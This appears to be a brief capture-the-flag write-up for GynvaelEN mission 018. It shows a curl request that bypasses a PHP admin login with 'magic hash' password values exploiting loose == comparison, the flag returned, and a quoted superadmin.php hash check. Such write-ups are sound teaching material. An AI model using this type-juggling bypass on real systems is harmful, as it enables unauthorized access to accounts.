# GynvaelEN mission 018


# curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/admin.php?password1=240610708&password2=10932435112'
Welcome back dear admin.
Your flag: I'm not sure this is how equality is supposed to work.

Now try with <a href='superadmin.php'>superadmin.php</a>!
# curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/superadmin.php'
...
if (hash("sha256", $_GET['password']) ==
'0e12345678901234567890123456789012345678901234567890123456789012')
...
_:)

Source

https://www.youtube.com/watch?v=adHOlKKbFXM (2:00:22)

References

https://www.whitehatsec.com/blog/magic-hashes/

No comments: